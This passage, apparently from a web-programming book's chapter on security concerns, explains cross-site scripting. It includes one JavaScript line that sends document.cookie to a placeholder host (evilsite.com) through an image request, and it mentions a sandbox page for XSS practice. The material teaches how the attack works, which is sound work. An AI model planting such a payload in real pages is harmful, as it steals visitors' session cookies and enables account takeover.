PART II
Chapter 7: Security Concerns 313
If the post goes through as is, when you come along, your cookie for the particular site
is alerted. Most likely, when this scenario happens for real, your cookies are not going to be
alerted. Instead, they are going to be transmitted to some site using an image request or
something like so:var cookieMonster = new Image(); cookieMonster.src='http://www.evilsite
.com/cookiecollecter.php?stolencookie='+escape(document.cookie);The whole process of XSS and how it might be used is shown in Figure 7-8.
If you would like to see XSS in action safely, you can use the example at http://
unsecure.ajaxref.com/ch7/insecureblog.php; it’s also shown in Figure 7-9 in case you have
some hesitation in using the example. The provided example can be used as a sandbox for
your own XSS experiments. It does have a preset cookie alert showing you that indeed XSS
works here.FIGURE 7-8 XSS overview